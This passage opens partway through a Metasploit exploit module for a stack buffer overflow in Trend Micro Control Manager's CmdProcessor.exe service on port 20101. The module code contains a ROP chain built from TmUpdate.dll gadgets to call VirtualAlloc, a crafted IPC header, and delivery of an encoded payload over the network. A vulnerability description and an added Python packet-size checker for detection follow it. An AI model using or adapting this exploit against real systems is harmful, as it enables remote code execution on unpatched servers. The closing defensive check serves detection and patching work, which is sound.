        Opt::RPORT(20101)
      ], self.class)
  end

  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  def exploit
    #TmUpdate.dll
    rop_chain = [
      0x668074d4, # POP EDX # OR AL,0F6 # RETN
      0x3FCD0FFC, # Put 00001000 into edx
      0x667611b2, # ADD EDX,C0330004 # RETN 04
      0x667c99e7, # POP EBP # RETN [TmUpdate.dll]
      junk,
      0x667c99e7, # skip 4 bytes [TmUpdate.dll]
      0x667e3250, # POP EBX # RETN [TmUpdate.dll]
      0xffffffff, # NEG EBX
      0x6683ab64, # INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
      0x6683ab64, # INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
      0x6680a1d3, # POP EAX # RETN [TmUpdate.dll]
      0xffffffc0, # Value to negate, will become 0x00000040
      0x66812b53, # NEG EAX # RETN [TmUpdate.dll]
      0x667f030a, # MOV ECX,EAX # RETN [TmUpdate.dll]
      0x667d4c7c, # POP EDI # RETN [TmUpdate.dll]
      0x667e8003, # RETN (ROP NOP) [TmUpdate.dll]
      0x667d54d0, # POP ESI # RETN [TmUpdate.dll]
      0x667baf06, # JMP [EAX] [TmUpdate.dll]
      0x66833376, # POP EAX # RETN [TmUpdate.dll]
      0x6686115c, # ptr to &VirtualAlloc() [IAT TmUpdate.dll]
      0x6681ceb3, # PUSHAD # RETN [TmUpdate.dll]
      0x668382c3, # ptr to 'call esp' [TmUpdate.dll]
    ].pack('V*')
    #rop chain generated by mona.py

    header = "\x00\x00"
    header << "\x13\x88" #size of buffer
    header << rand_text_alpha(9)
    header << "\x15\x09\x13" #opcode
    header << "\x00\x00\x00"
    header << rand_text_alpha(25)
    header << "\xFE\xFF\xFF\xFF" #in instruction #MOV EDI,DWORD PTR DS:[EAX+ECX] #ECX is our buffer and needs to be readable dword
    header << "\xFF\xFF\xFF\xFF" #after sum with EAX. Pointer from EAX increments by #LEA EAX,DWORD PTR DS:[EAX+EDI+4] and then is saved
    header << "\xFF\xFF\xF4\xFF" #and used again. We can essentially walk the loop which increments EBX by 1 until we get to 14 which leads
    header << "\xFF\xFF" #us to our vulnerable function
    header << rand_text_alpha(1) #align stack again for rop

    pay = rop_chain
    pay << make_nops(374 - rop_chain.length)
    pay << "\xeb\x04" #Short jmp 0x04
    pay << [target.ret].pack('V')
    pay << payload.encoded

    sploit = header
    sploit << pay
    filler = rand_text_alpha(target['Offset'] - (sploit.length))

    connect
    print_status("Sending request...")
    sock.put(sploit + filler)
    handler
    disconnect
  end
end
This Metasploit module exploits a vulnerability in the CmdProcessor.exe component of Trend Micro Control Manager up to version 5.5. The specific flaw exists within CmdProcessor.exe service running on TCP port 20101. The vulnerable function is the CGenericScheduler::AddTask function of cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet, controlled data is copied into a 256-byte stack buffer. This can be exploited to execute remote code under the context of the user.
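The defect the module describes is a length mismatch: the request carries its own size field, yet the handler copies the controlled data into a fixed 256-byte stack buffer without checking that the declared size fits. The following is an added example, not code from the Metasploit module or from Trend Micro, of the receive-side sanity check a patched handler (or an IDS rule on port 20101) would apply. The only layout facts used come from the module's own header construction: two zero bytes, then the 2-byte "size of buffer" field (`\x13\x88`), nine filler bytes, then the 3-byte opcode (`\x15\x09\x13`). Reading the size field as big-endian is an assumption (it gives 0x1388 = 5000, which matches the 'Offset' the module pads the request to); the sample packets are constructed.

```python
import struct

STACK_BUFFER_SIZE = 256          # from the module description
SIZE_FIELD_OFFSET = 2            # right after the leading "\x00\x00"
OPCODE_OFFSET = 2 + 2 + 9        # size field, then rand_text_alpha(9)
OPCODE_LEN = 3
MODULE_OPCODE = b'\x15\x09\x13'  # opcode the public module sends


def check_ipc_packet(pkt, buffer_size=STACK_BUFFER_SIZE):
    """Return a list of findings for one received packet (empty means nothing odd).

    A handler would refuse the packet on the second finding before copying;
    a monitor would alert on any of them.
    """
    findings = []
    if len(pkt) < OPCODE_OFFSET + OPCODE_LEN:
        return ['truncated header (%d bytes)' % len(pkt)]
    # Assumed big-endian; see the lead-in.
    declared = struct.unpack_from('>H', pkt, SIZE_FIELD_OFFSET)[0]
    opcode = pkt[OPCODE_OFFSET:OPCODE_OFFSET + OPCODE_LEN]
    if declared != len(pkt):
        findings.append('declared size %d does not match received %d'
                        % (declared, len(pkt)))
    if declared > buffer_size:
        findings.append('declared size %d exceeds %d-byte destination buffer'
                        % (declared, buffer_size))
    if opcode == MODULE_OPCODE:
        findings.append('opcode %s matches the public exploit module' % opcode.hex())
    return findings


def build_packet(size, opcode, fill=b'Z'):
    """Constructed helper: a packet with the header layout above and `size` total bytes."""
    head = b'\x00\x00' + struct.pack('>H', size) + b'X' * 9 + opcode + b'\x00' * 3
    return head + fill * (size - len(head))


CRAFTED = build_packet(5000, MODULE_OPCODE)   # the shape of the module's request
BENIGN = build_packet(64, b'\x01\x02\x03')    # constructed small request

if __name__ == '__main__':
    for name, pkt in (('crafted', CRAFTED), ('benign', BENIGN)):
        print(name, check_ipc_packet(pkt) or 'ok')
```

The check compares the declared size against both the bytes actually received and the capacity of the destination buffer; the first catches malformed or truncated frames, the second is the missing bound the advisory describes.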